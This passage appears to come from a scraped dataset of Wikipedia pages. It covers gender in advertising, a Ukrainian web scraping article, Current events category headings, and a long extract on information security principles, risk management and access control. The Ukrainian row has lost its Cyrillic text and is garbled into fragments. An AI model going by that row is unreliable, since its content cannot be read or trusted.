constantly changing. However, the one thing that stays the same in these ads is that there is music in the background and the silhouette is listening to that music on a white iPod through white headphones. Through advertising, the white color on a set of earphones now signifies that the music device is an iPod. The white color signifies almost all of Apple's products. 160 The semiotics of gender plays a key influence on the way in which signs are interpreted. When considering gender roles in advertising, individuals are influenced by three categories. Certain characteristics of stimuli may enhance or decrease the elaboration of the message (if the product is perceived as feminine or masculine). Second, the characteristics of individuals can affect attention and elaboration of the message (traditional or non-traditional gender role orientation). Lastly, situational factors may be important to influence the elaboration of the message. citation needed There are two types of marketing communication claims-objective and subjective. 161 Objective claims stem from the extent to which the claim associates the brand with a tangible product or service feature. For instance, a camera may have auto-focus features. Subjective claims convey emotional, subjective, impressions of intangible aspects of a product or service. They are non-physical features of a product or service that cannot be directly perceived, as they have no physical reality. For instance the brochure has a beautiful design. 162 Males tend to respond better to objective marketing-communications claims while females tend to respond better to subjective marketing communications claims. 163 Voiceovers are commonly used in advertising. Most voiceovers are done by men, with figures of up to 94% having been reported. 164 There have been more female voiceovers in recent years, when? but mainly for food, household products, and feminine-care products. 165 According to a 1977 study by David Statt, females process information comprehensively, while males process information through heuristic devices such as procedures, methods or strategies for solving problems, which could have an effect on how they interpret advertising. 166 need quotation to verify According to this study, men prefer to have available and apparent cues to interpret the message, whereas females engage in more creative, associative, imagery-laced interpretation. Later research by a Danish team 167 found that advertising attempts to persuade men to improve their appearance or performance, whereas its approach to women aims at transformation toward an impossible ideal of female presentation. In Paul Suggett's article "The Objectification of Women in Advertising" he discusses the negative impact that these women in advertisements, who are too perfect to be real, have on women, as well as men, in real life. 168 Advertising's manipulation of women's aspiration to these ideal types as portrayed in film, in erotic art, in advertising, on stage, within music videos and through other media exposures requires at least a conditioned rejection of female reality and thereby takes on a highly ideological cast. Studies show that these expectations of women and young girls negatively affect their views about their bodies and appearances. These advertisements are directed towards men. Not everyone agrees: one critic viewed this monologic, gender-specific interpretation of advertising as excessively skewed and politicized. 169 need quotation to verify There are some companies like Dove and aerie that are creating commercials to portray more natural women, with less post production manipulation, so more women and young girls are able to relate to them. citation needed More recent research by Martin (2003) reveals that males and females differ in how they react to advertising depending on their mood at the time of exposure to the ads and on the affective tone of the advertising. When feeling sad, males prefer happy ads to boost their mood. In contrast, females prefer happy ads when they are feeling happy. The television programs in which ads are embedded influence a viewer's mood state. 170 Susan Wojcicki, author of the article "Ads that Empower Women don't just Break Stereotypes—They're also Effective" discusses how advertising to women has changed since the first Barbie commercial, where a little girl tells the doll that, she wants to be just like her. Little girls grow up watching advertisements of scantily clad women advertising things from trucks to burgers and Wojcicki states that this shows girls that they are either arm candy or eye candy. 171 Other approaches to revenue include donations, paid subscriptions, microtransactions, and data monetization. Websites and applications are "ad-free" when not using advertisements at all for revenue. For example, the online encyclopedia Wikipedia provides free 172 content by receiving funding from charitable donations. 173 Notes |
321 | https://en.wikipedia.org/wiki/Web_scraping | https://uk.wikipedia.org/wiki/Web_scraping | ( . scraping — , ) — , . , ' , , ' HTTP, . . , , , . . ( , ), . , , . , , , . URL ( ). (HTML XHTML) . , . , . — . , . , ( ) . , ' , ' , , . ' (crawling indexing). — . ( , ) , . , , HTML, , , . ' , ' . , , , , , . HTML, , (Web API). , HTTP, , . — . , , , , , ' . Ad-Hoc, , , , . . , . 1 2023 , Twitter , . , : 6000 ; 600 ; 300 ". , , 30 2023 Twitter 2 . " " 3 . CNBC, Twitter “ ”. X Corp., 9 2023 Twitter, Inc., , ’ ( ), Twitter. , 6 2023 ( ) 1 4 . , , . , . X Corp. IP . , ’ . , , . , X Corp. , , 5 . 30 2020 (CNIL) . 6 CNIL , , . 7 15 2015 8 Ryanair PR Aviation . Ryanair , . PR Aviation — , low-cost . , Ryanair. Ryanair , . , , , , , Ryanair. Ryanair , PR Aviation , , . , , Ryanair . 9 . 96 9 11 1996 , , , , 6(1), 8 15 — — . |
322 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Portal:Current_events | Armed conflicts and attacks Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Business and economy Disasters and accidents Health and environment International relations Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Arts and culture Business and economy Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Disasters and accidents International relations Politics and elections Sports |
323 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_security | Information security, sometimes shortened to infosec, 1 is the practice of protecting information by mitigating information risks. It is part of information risk management. 2 3 It typically involves preventing or reducing the probability of unauthorized or inappropriate access to data or the unlawful use, disclosure, disruption, deletion, corruption, modification, inspection, recording, or devaluation of information. 4 It also involves actions intended to reduce the adverse impacts of such incidents. Protected information may take any form, e.g., electronic or physical, tangible (e.g., paperwork), or intangible (e.g., knowledge). 5 6 Information security's primary focus is the balanced protection of data confidentiality, integrity, and availability (also known as the "CIA" triad) while maintaining a focus on efficient policy implementation, all without hampering organization productivity. 7 This is largely achieved through a structured risk management process that involves: To standardize this discipline, academics and professionals collaborate to offer guidance, policies, and industry standards on passwords, antivirus software, firewalls, encryption software, legal liability, security awareness and training, and so forth. 9 This standardization may be further driven by a wide variety of laws and regulations that affect how data is accessed, processed, stored, transferred, and destroyed. 10 However, the implementation of any standards and guidance within an entity may have limited effect if a culture of continual improvement is not adopted. 11 Various definitions of information security are suggested below, summarized from different sources: At the core of information security is information assurance, the act of maintaining the confidentiality, integrity, and availability (CIA) of information, ensuring that information is not compromised in any way when critical issues arise. 24 These issues include but are not limited to natural disasters, computer server malfunction, and physical theft. While paper-based business operations are still prevalent, requiring their own set of information security practices, enterprise digital initiatives are increasingly being emphasized, 25 26 with information assurance now typically being dealt with by information technology (IT) security specialists. These specialists apply information security to technology (most often some form of computer system). It is worthwhile to note that a computer does not necessarily mean a home desktop. 27 A computer is any device with a processor and some memory. Such devices can range from non-networked standalone devices as simple as calculators, to networked mobile computing devices such as smartphones and tablet computers. 28 IT security specialists are almost always found in any major enterprise establishment due to the nature and value of the data within larger businesses. 29 They are responsible for keeping all of the technology within the company secure from malicious cyber attacks that often attempt to acquire critical private information or gain control of the internal systems. 30 31 The field of information security has grown and evolved significantly in recent years. 32 It offers many areas for specialization, including securing networks and allied infrastructure, securing applications and databases, security testing, information systems auditing, business continuity planning, electronic record discovery, and digital forensics. 33 Information security professionals are very stable in their employment. 34 As of 2013 update more than 80 percent of professionals had no change in employer or employment over a period of a year, and the number of professionals is projected to continuously grow more than 11 percent annually from 2014 to 2019. 35 Information security threats come in many different forms. 36 37 Some of the most common threats today are software attacks, theft of intellectual property, theft of identity, theft of equipment or information, sabotage, and information extortion. 38 39 Viruses, 40 worms, phishing attacks, and Trojan horses are a few common examples of software attacks. The theft of intellectual property has also been an extensive issue for many businesses in the information technology (IT) field. 41 Identity theft is the attempt to act as someone else usually to obtain that person's personal information or to take advantage of their access to vital information through social engineering. 42 43 Theft of equipment or information is becoming more prevalent today due to the fact that most devices today are mobile, 44 are prone to theft and have also become far more desirable as the amount of data capacity increases. Sabotage usually consists of the destruction of an organization's website in an attempt to cause loss of confidence on the part of its customers. 45 Information extortion consists of theft of a company's property or information as an attempt to receive a payment in exchange for returning the information or property back to its owner, as with ransomware. 46 There are many ways to help protect yourself from some of these attacks but one of the most functional precautions is conduct periodical user awareness. 47 The number one threat to any organisation are users or internal employees, they are also called insider threats. 48 Governments, military, corporations, financial institutions, hospitals, non-profit organisations, and private businesses amass a great deal of confidential information about their employees, customers, products, research, and financial status. 49 Should confidential information about a business's customers or finances or new product line fall into the hands of a competitor or a black hat hacker, a business and its customers could suffer widespread, irreparable financial loss, as well as damage to the company's reputation. 50 From a business perspective, information security must be balanced against cost; the Gordon-Loeb Model provides a mathematical economic approach for addressing this concern. 51 For the individual, information security has a significant effect on privacy, which is viewed very differently in various cultures. 52 Possible responses to a security threat or risk are: 53 Since the early days of communication, diplomats and military commanders understood that it was necessary to provide some mechanism to protect the confidentiality of correspondence and to have some means of detecting tampering. 55 Julius Caesar is credited with the invention of the Caesar cipher c. 50 B.C., which was created in order to prevent his secret messages from being read should a message fall into the wrong hands. 56 However, for the most part protection was achieved through the application of procedural handling controls. 57 58 Sensitive information was marked up to indicate that it should be protected and transported by trusted persons, guarded and stored in a secure environment or strong box. 59 As postal services expanded, governments created official organizations to intercept, decipher, read, and reseal letters (e.g., the U.K.'s Secret Office, founded in 1653 60 ). In the mid-nineteenth century more complex classification systems were developed to allow governments to manage their information according to the degree of sensitivity. 61 For example, the British Government codified this, to some extent, with the publication of the Official Secrets Act in 1889. 62 Section 1 of the law concerned espionage and unlawful disclosures of information, while Section 2 dealt with breaches of official trust. 63 A public interest defense was soon added to defend disclosures in the interest of the state. 64 A similar law was passed in India in 1889, The Indian Official Secrets Act, which was associated with the British colonial era and used to crack down on newspapers that opposed the Raj's policies. 65 A newer version was passed in 1923 that extended to all matters of confidential or secret information for governance. 66 By the time of the First World War, multi-tier classification systems were used to communicate information to and from various fronts, which encouraged greater use of code making and breaking sections in diplomatic and military headquarters. 67 Encoding became more sophisticated between the wars as machines were employed to scramble and unscramble information. 68 The establishment of computer security inaugurated the history of information security. The need for such appeared during World War II. 69 The volume of information shared by the Allied countries during the Second World War necessitated formal alignment of classification systems and procedural controls. 70 An arcane range of markings evolved to indicate who could handle documents (usually officers rather than enlisted troops) and where they should be stored as increasingly complex safes and storage facilities were developed. 71 The Enigma Machine, which was employed by the Germans to encrypt the data of warfare and was successfully decrypted by Alan Turing, can be regarded as a striking example of creating and using secured information. 72 Procedures evolved to ensure documents were destroyed properly, and it was the failure to follow these procedures which led to some of the greatest intelligence coups of the war (e.g., the capture of U 570 72 ). Various mainframe computers were connected online during the Cold War to complete more sophisticated tasks, in a communication process easier than mailing magnetic tapes back and forth by computer centers. As such, the Advanced Research Projects Agency (ARPA), of the United States Department of Defense, started researching the feasibility of a networked system of communication to trade information within the United States Armed Forces. In 1968, the ARPANET project was formulated by Larry Roberts, which would later evolve into what is known as the internet. 73 In 1973, important elements of ARPANET security were found by internet pioneer Robert Metcalfe to have many flaws such as the: "vulnerability of password structure and formats; lack of safety procedures for dial-up connections; and nonexistent user identification and authorizations", aside from the lack of controls and safeguards to keep data safe from unauthorized access. Hackers had effortless access to ARPANET, as phone numbers were known by the public. 74 Due to these problems, coupled with the constant violation of computer security, as well as the exponential increase in the number of hosts and users of the system, "network security" was often alluded to as "network insecurity". 74 The end of the twentieth century and the early years of the twenty-first century saw rapid advancements in telecommunications, computing hardware and software, and data encryption. 75 The availability of smaller, more powerful, and less expensive computing equipment made electronic data processing within the reach of small business and home users. 76 The establishment of Transfer Control Protocol Internetwork Protocol (TCP IP) in the early 1980s enabled different types of computers to communicate. 77 These computers quickly became interconnected through the internet. 78 The rapid growth and widespread use of electronic data processing and electronic business conducted through the internet, along with numerous occurrences of international terrorism, fueled the need for better methods of protecting the computers and the information they store, process, and transmit. 79 The academic disciplines of computer security and information assurance emerged along with numerous professional organizations, all sharing the common goals of ensuring the security and reliability of information systems. 80 The "CIA" triad of confidentiality, integrity, and availability is at the heart of information security. 81 (The members of the classic InfoSec triad—confidentiality, integrity, and availability—are interchangeably referred to in the literature as security attributes, properties, security goals, fundamental aspects, information criteria, critical information characteristics and basic building blocks.) 82 However, debate continues about whether or not this triad is sufficient to address rapidly changing technology and business requirements, with recommendations to consider expanding on the intersections between availability and confidentiality, as well as the relationship between security and privacy. 24 Other principles such as "accountability" have sometimes been proposed; it has been pointed out that issues such as non-repudiation do not fit well within the three core concepts. 83 The triad seems to have first been mentioned in a NIST publication in 1977. 84 In 1992 and revised in 2002, the OECD's Guidelines for the Security of Information Systems and Networks 85 proposed the nine generally accepted principles: awareness, responsibility, response, ethics, democracy, risk assessment, security design and implementation, security management, and reassessment. 86 Building upon those, in 2004 the NIST's Engineering Principles for Information Technology Security 83 proposed 33 principles. From each of these derived guidelines and practices. In 1998, Donn Parker proposed an alternative model for the classic "CIA" triad that he called the six atomic elements of information. The elements are confidentiality, possession, integrity, authenticity, availability, and utility. The merits of the Parkerian Hexad are a subject of debate amongst security professionals. 87 In 2011, The Open Group published the information security management standard O-ISM3. 88 This standard proposed an operational definition of the key concepts of security, with elements called "security objectives", related to access control (9), availability (3), data quality (1), compliance, and technical (4). In 2009, DoD Software Protection Initiative Archived 2016 09 25 at the Wayback Machine released the Three Tenets of Cybersecurity Archived 2020 05 10 at the Wayback Machine which are System Susceptibility, Access to the Flaw, and Capability to Exploit the Flaw. 89 90 91 Neither of these models are widely adopted. In information security, confidentiality "is the property, that information is not made available or disclosed to unauthorized individuals, entities, or processes. 92 While similar to "privacy, the two words are not interchangeable. Rather, confidentiality is a component of privacy that implements to protect our data from unauthorized viewers. 93 Examples of confidentiality of electronic data being compromised include laptop theft, password theft, or sensitive emails being sent to the incorrect individuals. 94 In IT security, data integrity means maintaining and assuring the accuracy and completeness of data over its entire lifecycle. 95 This means that data cannot be modified in an unauthorized or undetected manner. 96 This is not the same thing as referential integrity in databases, although it can be viewed as a special case of consistency as understood in the classic ACID model of transaction processing. 97 Information security systems typically incorporate controls to ensure their own integrity, in particular protecting the kernel or core functions against both deliberate and accidental threats. 98 Multi-purpose and multi-user computer systems aim to compartmentalize the data and processing such that no user or process can adversely impact another: the controls may not succeed however, as we see in incidents such as malware infections, hacks, data theft, fraud, and privacy breaches. 99 More broadly, integrity is an information security principle that involves human social, process, and commercial integrity, as well as data integrity. As such it touches on aspects such as credibility, consistency, truthfulness, completeness, accuracy, timeliness, and assurance. 100 For any information system to serve its purpose, the information must be available when it is needed. 101 This means the computing systems used to store and process the information, the security controls used to protect it, and the communication channels used to access it must be functioning correctly. 102 High availability systems aim to remain available at all times, preventing service disruptions due to power outages, hardware failures, and system upgrades. 103 Ensuring availability also involves preventing denial-of-service attacks, such as a flood of incoming messages to the target system, essentially forcing it to shut down. 104 In the realm of information security, availability can often be viewed as one of the most important parts of a successful information security program. citation needed Ultimately end-users need to be able to perform job functions; by ensuring availability an organization is able to perform to the standards that an organization's stakeholders expect. 105 This can involve topics such as proxy configurations, outside web access, the ability to access shared drives and the ability to send emails. 106 Executives oftentimes do not understand the technical side of information security and look at availability as an easy fix, but this often requires collaboration from many different organizational teams, such as network operations, development operations, incident response, and policy change management. 107 A successful information security team involves many different key roles to mesh and align for the "CIA" triad to be provided effectively. 108 In law, non-repudiation implies one's intention to fulfill their obligations to a contract. It also implies that one party of a transaction cannot deny having received a transaction, nor can the other party deny having sent a transaction. 109 It is important to note that while technology such as cryptographic systems can assist in non-repudiation efforts, the concept is at its core a legal concept transcending the realm of technology. 110 It is not, for instance, sufficient to show that the message matches a digital signature signed with the sender's private key, and thus only the sender could have sent the message, and nobody else could have altered it in transit (data integrity). 111 The alleged sender could in return demonstrate that the digital signature algorithm is vulnerable or flawed, or allege or prove that his signing key has been compromised. 112 The fault for these violations may or may not lie with the sender, and such assertions may or may not relieve the sender of liability, but the assertion would invalidate the claim that the signature necessarily proves authenticity and integrity. As such, the sender may repudiate the message (because authenticity and integrity are pre-requisites for non-repudiation). 113 Broadly speaking, risk is the likelihood that something bad will happen that causes harm to an informational asset (or the loss of the asset). 114 A vulnerability is a weakness that could be used to endanger or cause harm to an informational asset. A threat is anything (man-made or act of nature) that has the potential to cause harm. 115 The likelihood that a threat will use a vulnerability to cause harm creates a risk. When a threat does use a vulnerability to inflict harm, it has an impact. 116 In the context of information security, the impact is a loss of availability, integrity, and confidentiality, and possibly other losses (lost income, loss of life, loss of real property). 117 The Certified Information Systems Auditor (CISA) Review Manual 2006 defines risk management as "the process of identifying vulnerabilities and threats to the information resources used by an organization in achieving business objectives, and deciding what countermeasures, 118 if any, to take in reducing risk to an acceptable level, based on the value of the information resource to the organization. 119 There are two things in this definition that may need some clarification. First, the process of risk management is an ongoing, iterative process. It must be repeated indefinitely. The business environment is constantly changing and new threats and vulnerabilities emerge every day. 120 Second, the choice of countermeasures (controls) used to manage risks must strike a balance between productivity, cost, effectiveness of the countermeasure, and the value of the informational asset being protected. 121 Furthermore, these processes have limitations as security breaches are generally rare and emerge in a specific context which may not be easily duplicated. 122 Thus, any process and countermeasure should itself be evaluated for vulnerabilities. 123 It is not possible to identify all risks, nor is it possible to eliminate all risk. The remaining risk is called "residual risk". 124 A risk assessment is carried out by a team of people who have knowledge of specific areas of the business. 125 Membership of the team may vary over time as different parts of the business are assessed. 126 The assessment may use a subjective qualitative analysis based on informed opinion, or where reliable dollar figures and historical information is available, the analysis may use quantitative analysis. Research has shown that the most vulnerable point in most information systems is the human user, operator, designer, or other human. 127 The ISO IEC 27002:2005 Code of practice for information security management recommends the following be examined during a risk assessment: In broad terms, the risk management process consists of: 128 129 For any given risk, management can choose to accept the risk based upon the relative low value of the asset, the relative low frequency of occurrence, and the relative low impact on the business. 136 Or, leadership may choose to mitigate the risk by selecting and implementing appropriate control measures to reduce the risk. In some cases, the risk can be transferred to another business by buying insurance or outsourcing to another business. 137 The reality of some risks may be disputed. In such cases leadership may choose to deny the risk. 138 Selecting and implementing proper security controls will initially help an organization bring down risk to acceptable levels. 139 Control selection should follow and should be based on the risk assessment. 140 Controls can vary in nature, but fundamentally they are ways of protecting the confidentiality, integrity or availability of information. ISO IEC 27001 has defined controls in different areas. 141 Organizations can implement additional controls according to requirement of the organization. 142 ISO IEC 27002 offers a guideline for organizational information security standards. 143 Administrative controls (also called procedural controls) consist of approved written policies, procedures, standards, and guidelines. Administrative controls form the framework for running the business and managing people. 144 They inform people on how the business is to be run and how day-to-day operations are to be conducted. Laws and regulations created by government bodies are also a type of administrative control because they inform the business. 145 Some industry sectors have policies, procedures, standards, and guidelines that must be followed the Payment Card Industry Data Security Standard 146 (PCI DSS) required by Visa and MasterCard is such an example. Other examples of administrative controls include the corporate security policy, password policy, hiring policies, and disciplinary policies. 147 Administrative controls form the basis for the selection and implementation of logical and physical controls. Logical and physical controls are manifestations of administrative controls, which are of paramount importance. 144 Logical controls (also called technical controls) use software and data to monitor and control access to information and computing systems. citation needed Passwords, network and host-based firewalls, network intrusion detection systems, access control lists, and data encryption are examples of logical controls. 148 An important logical control that is frequently overlooked is the principle of least privilege, which requires that an individual, program or system process not be granted any more access privileges than are necessary to perform the task. 149 A blatant example of the failure to adhere to the principle of least privilege is logging into Windows as user Administrator to read email and surf the web. Violations of this principle can also occur when an individual collects additional access privileges over time. 150 This happens when employees' job duties change, employees are promoted to a new position, or employees are transferred to another department. 151 The access privileges required by their new duties are frequently added onto their already existing access privileges, which may no longer be necessary or appropriate. 152 Physical controls monitor and control the environment of the work place and computing facilities. 153 They also monitor and control access to and from such facilities and include doors, locks, heating and air conditioning, smoke and fire alarms, fire suppression systems, cameras, barricades, fencing, security guards, cable locks, etc. Separating the network and workplace into functional areas are also physical controls. 154 An important physical control that is frequently overlooked is separation of duties, which ensures that an individual can not complete a critical task by himself. 155 For example, an employee who submits a request for reimbursement should not also be able to authorize payment or print the check. 156 An applications programmer should not also be the server administrator or the database administrator; these roles and responsibilities must be separated from one another. 157 Information security must protect information throughout its lifespan, from the initial creation of the information on through to the final disposal of the information. 158 The information must be protected while in motion and while at rest. During its lifetime, information may pass through many different information processing systems and through many different parts of information processing systems. 159 There are many different ways the information and information systems can be threatened. To fully protect the information during its lifetime, each component of the information processing system must have its own protection mechanisms. 160 The building up, layering on, and overlapping of security measures is called "defense in depth. 161 In contrast to a metal chain, which is famously only as strong as its weakest link, the defense in depth strategy aims at a structure where, should one defensive measure fail, other measures will continue to provide protection. 162 Recall the earlier discussion about administrative controls, logical controls, and physical controls. The three types of controls can be used to form the basis upon which to build a defense in depth strategy. 144 With this approach, defense in depth can be conceptualized as three distinct layers or planes laid one on top of the other. 163 Additional insight into defense in depth can be gained by thinking of it as forming the layers of an onion, with data at the core of the onion, people the next outer layer of the onion, and network security, host-based security, and application security forming the outermost layers of the onion. 164 Both perspectives are equally valid, and each provides valuable insight into the implementation of a good defense in depth strategy. 165 An important aspect of information security and risk management is recognizing the value of information and defining appropriate procedures and protection requirements for the information. 166 Not all information is equal and so not all information requires the same degree of protection. 167 This requires information to be assigned a security classification. 168 The first step in information classification is to identify a member of senior management as the owner of the particular information to be classified. Next, develop a classification policy. 169 The policy should describe the different classification labels, define the criteria for information to be assigned a particular label, and list the required security controls for each classification. 170 Some factors that influence which classification information should be assigned include how much value that information has to the organization, how old the information is and whether or not the information has become obsolete. 171 Laws and other regulatory requirements are also important considerations when classifying information. 172 The Information Systems Audit and Control Association (ISACA) and its Business Model for Information Security also serves as a tool for security professionals to examine security from a systems perspective, creating an environment where security can be managed holistically, allowing actual risks to be addressed. 173 The type of information security classification labels selected and used will depend on the nature of the organization, with examples being: 170 All employees in the organization, as well as business partners, must be trained on the classification schema and understand the required security controls and handling procedures for each classification. 176 The classification of a particular information asset that has been assigned should be reviewed periodically to ensure the classification is still appropriate for the information and to ensure the security controls required by the classification are in place and are followed in their right procedures. 177 Access to protected information must be restricted to people who are authorized to access the information. 178 The computer programs, and in many cases the computers that process the information, must also be authorized. 179 This requires that mechanisms be in place to control the access to protected information. 179 The sophistication of the access control mechanisms should be in parity with the value of the information being protected; the more sensitive or valuable the information the stronger the control mechanisms need to be. 180 The foundation on which access control mechanisms are built start with identification and authentication. 181 Access control is generally considered in three steps: identification, authentication, and authorization. 182 94 Identification is an assertion of who someone is or what something is. If a person makes the statement "Hello, my name is John Doe" they are making a claim of who they are. 183 However, their claim may or may not be true. Before John Doe can be granted access to protected information it will be necessary to verify that the person claiming to be John Doe really is John Doe. 184 Typically the claim is in the form of a username. By entering that username you are claiming "I am the person the username belongs to". 185 Authentication is the act of verifying a claim of identity. When John Doe goes into a bank to make a withdrawal, he tells the bank teller he is John Doe, a claim of identity. 186 The bank teller asks to see a photo ID, so he hands the teller his driver's license. 187 The bank teller checks the license to make sure it has John Doe printed on it and compares the photograph on the license against the person claiming to be John Doe. 188 If the photo and name match the person, then the teller has authenticated that John Doe is who he claimed to be. Similarly, by entering the correct password, the user is providing evidence that he she is the person the username belongs to. 189 There are three different types of information that can be used for authentication: 190 191 Strong authentication requires providing more than one type of authentication information (two-factor authentication). 197 The username is the most common form of identification on computer systems today and the password is the most common form of authentication. 198 Usernames and passwords have served their purpose, but they are increasingly inadequate. 199 Usernames and passwords are slowly being replaced or supplemented with more sophisticated authentication mechanisms such as time-based one-time password algorithms. 200 After a person, program or computer has successfully been identified and authenticated then it must be determined what informational resources they are permitted to access and what actions they will be allowed to perform (run, view, create, delete, or change). 201 This is called authorization. Authorization to access information and other computing services begins with administrative policies and procedures. 202 The policies prescribe what information and computing services can be accessed, by whom, and under what conditions. The access control mechanisms are then configured to enforce these policies. 203 Different computing systems are equipped with different kinds of access control mechanisms. Some may even offer a choice of different access control mechanisms. 204 The access control mechanism a system offers will be based upon one of three approaches to access control, or it may be derived from a combination of the three approaches. 94 The non-discretionary approach consolidates all access control under a centralized administration. 205 The access to information and other resources is usually based on the individuals function (role) in the organization or the tasks the individual must perform. 206 207 The discretionary approach gives the creator or owner of the information resource the ability to control access to those resources. 205 In the mandatory access control approach, access is granted or denied basing upon the security classification assigned to the information resource. 178 Examples of common access control mechanisms in use today include role-based access control, available in many advanced database management systems; simple file permissions provided in the UNIX and Windows operating systems; 208 Group Policy Objects provided in Windows network systems; and Kerberos, RADIUS, TACACS, and the simple access lists used in many firewalls and routers. 209 To be effective, policies and other security controls must be enforceable and upheld. Effective policies ensure that people are held accountable for their actions. 210 The U.S. Treasury's guidelines for systems processing sensitive or proprietary information, for example, states that all failed and successful authentication and access attempts must be logged, and all access to information must leave some type of audit trail. 211 Also, the need-to-know principle needs to be in effect when talking about access control. This principle gives access rights to a person to perform their job functions. 212 This principle is used in the government when dealing with difference clearances. 213 Even though two employees in different departments have a top-secret clearance, they must have a need-to-know in order for information to be exchanged. Within the need-to-know principle, network administrators grant the employee the least amount of privilege to prevent employees from accessing more than what they are supposed to. 214 Need-to-know helps to enforce the confidentiality-integrity-availability triad. Need-to-know directly impacts the confidential area of the triad. 215 Information security uses cryptography to transform usable information into a form that renders it unusable by anyone other than an authorized user; this process is called encryption. 216 Information that has been encrypted (rendered unusable) can be transformed back into its original usable form by an authorized user who possesses the cryptographic key, through the process of decryption. 217 Cryptography is used in information security to protect information from unauthorized or accidental disclosure while the information is in transit (either electronically or physically) and while information is in storage. 94 Cryptography provides information security with other useful applications as well, including improved authentication methods, message digests, digital signatures, non-repudiation, and encrypted network communications. 218 Older, less secure applications such as Telnet and File Transfer Protocol (FTP) are slowly being replaced with more secure applications such as Secure Shell (SSH) that use encrypted network communications. 219 Wireless communications can be encrypted using protocols such as WPA WPA2 or the older (and less secure) WEP. Wired communications (such as ITU T G.hn) are secured using AES for encryption and X.1035 for authentication and key exchange. 220 Software applications such as GnuPG or PGP can be used to encrypt data files and email. 221 Cryptography can introduce security problems when it is not implemented correctly. 222 Cryptographic solutions need to be implemented using industry-accepted solutions that have undergone rigorous peer review by independent experts in cryptography. 223 The length and strength of the encryption key is also an important consideration. 224 A key that is weak or too short will produce weak encryption. 224 The keys used for encryption and decryption must be protected with the same degree of rigor as any other confidential information. 225 They must be protected from unauthorized disclosure and destruction, and they must be available when needed. citation needed Public key infrastructure (PKI) solutions address many of the problems that surround key management. 94 The terms "reasonable and prudent person", "due care", and "due diligence" have been used in the fields of finance, securities, and law for many years. In recent years these terms have found their way into the fields of computing and information security. 129 U.S. Federal Sentencing Guidelines now make it possible to hold corporate officers liable for failing to exercise due care and due diligence in the management of their information systems. 226 In the business world, stockholders, customers, business partners, and governments have the expectation that corporate officers will run the business in accordance with accepted business practices and in compliance with laws and other regulatory requirements. This is often described as the "reasonable and prudent person" rule. A prudent person takes due care to ensure that everything necessary is done to operate the business by sound business principles and in a legal, ethical manner. A prudent person is also diligent (mindful, attentive, ongoing) in their due care of the business. In the field of information security, Harris 227 offers the following definitions of due care and due diligence: "Due care are steps that are taken to show that a company has taken responsibility for the activities that take place within the corporation and has taken the necessary steps to help protect the company, its resources, and employees 228 . And, Due diligence are the "continual activities that make sure the protection mechanisms are continually maintained and operational. 229 Attention should be made to two important points in these definitions. 230 231 First, in due care, steps are taken to show; this means that the steps can be verified, measured, or even produce tangible artifacts. 232 233 Second, in due diligence, there are continual activities; this means that people are actually doing things to monitor and maintain the protection mechanisms, and these activities are ongoing. 234 Organizations have a responsibility with practicing duty of care when applying information security. The Duty of Care Risk Analysis Standard (DoCRA) 235 provides principles and practices for evaluating risk. 236 It considers all parties that could be affected by those risks. 237 DoCRA helps evaluate safeguards if they are appropriate in protecting others from harm while presenting a reasonable burden. 238 With increased data breach litigation, companies must balance security controls, compliance, and its mission. 239 The Software Engineering Institute at Carnegie Mellon University, in a publication titled Governing for Enterprise Security (GES) Implementation Guide, defines characteristics of effective security governance. These include: 240 An incident response plan (IRP) is a group of policies that dictate an organizations reaction to a cyber attack. Once an security breach has been identified, for example by network intrusion detection system (NIDS) or host-based intrusion detection system (HIDS) (if configured to do so), the plan is initiated. 241 It is important to note that there can be legal implications to a data breach. Knowing local and federal laws is critical. 242 Every plan is unique to the needs of the organization, and it can involve skill sets that are not part of an IT team. 243 For example, a lawyer may be included in the response plan to help navigate legal implications to a data breach. citation needed As mentioned above every plan is unique but most plans will include the following: 244 Good preparation includes the development of an incident response team (IRT). 245 Skills need to be used by this team would be, penetration testing, computer forensics, network security, etc. 246 This team should also keep track of trends in cybersecurity and modern attack strategies. 247 A training program for end users is important as well as most modern attack strategies target users on the network. 244 This part of the incident response plan identifies if there was a security event. 248 When an end user reports information or an admin notices irregularities, an investigation is launched. An incident log is a crucial part of this step. citation needed All of the members of the team should be updating this log to ensure that information flows as fast as possible. 249 If it has been identified that a security breach has occurred the next step should be activated. 250 In this phase, the IRT works to isolate the areas that the breach took place to limit the scope of the security event. 251 During this phase it is important to preserve information forensically so it can be analyzed later in the process. 252 Containment could be as simple as physically containing a server room or as complex as segmenting a network to not allow the spread of a virus. 253 This is where the threat that was identified is removed from the affected systems. 254 This could include deleting malicious files, terminating compromised accounts, or deleting other components. 255 256 Some events do not require this step, however it is important to fully understand the event before moving to this step. 257 This will help to ensure that the threat is completely removed. 253 This stage is where the systems are restored back to original operation. 258 This stage could include the recovery of data, changing user access information, or updating firewall rules or policies to prevent a breach in the future. 259 260 Without executing this step, the system could still be vulnerable to future security threats. 253 In this step information that has been gathered during this process is used to make future decisions on security. 261 This step is crucial to the ensure that future events are prevented. Using this information to further train admins is critical to the process. 262 This step can also be used to process information that is distributed from other entities who have experienced a security event. 263 Change management is a formal process for directing and controlling alterations to the information processing environment. 264 265 This includes alterations to desktop computers, the network, servers, and software. 266 The objectives of change management are to reduce the risks posed by changes to the information processing environment and improve the stability and reliability of the processing environment as changes are made. 267 It is not the objective of change management to prevent or hinder necessary changes from being implemented. 268 269 Any change to the information processing environment introduces an element of risk. 270 Even apparently simple changes can have unexpected effects. 271 One of management's many responsibilities is the management of risk. 272 273 Change management is a tool for managing the risks introduced by changes to the information processing environment. 274 Part of the change management process ensures that changes are not implemented at inopportune times when they may disrupt critical business processes or interfere with other changes being implemented. 275 Not every change needs to be managed. 276 277 Some kinds of changes are a part of the everyday routine of information processing and adhere to a predefined procedure, which reduces the overall level of risk to the processing environment. 278 Creating a new user account or deploying a new desktop computer are examples of changes that do not generally require change management. 279 However, relocating user file shares, or upgrading the Email server pose a much higher level of risk to the processing environment and are not a normal everyday activity. 280 The critical first steps in change management are (a) defining change (and communicating that definition) and (b) defining the scope of the change system. 281 Change management is usually overseen by a change review board composed of representatives from key business areas, 282 security, networking, systems administrators, database administration, application developers, desktop support, and the help desk. 283 The tasks of the change review board can 